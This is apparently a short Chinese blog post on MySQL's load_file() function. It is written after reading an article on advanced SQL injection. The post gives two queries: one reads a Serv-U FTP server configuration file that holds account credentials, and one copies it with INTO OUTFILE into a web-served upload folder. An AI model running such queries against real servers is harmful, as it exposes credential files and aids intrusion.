mysql中的load_file()函数

看了angel的《Advanced SQL Injection with MySQL》(http://www.4ngel.net/)

里面所使用的load_file()函数确实好用

在phpmyadmin中试了一下,确实可以

不过直接查询只能显示文件头的一小段

需要导出为文件才能看到完整文件

  1. select load_file(“e:/Program Files/Serv-U/ServUDaemon.ini”)
  2. select load_file(“e:/Program Files/Serv-U/ServUDaemon.ini”)  from table_name into outfile “g:/wwwroot/upload/index.php.bak3”

要导出文件,则 from table_name不可缺!

Leave a Reply

Your email address will not be published. Required fields are marked *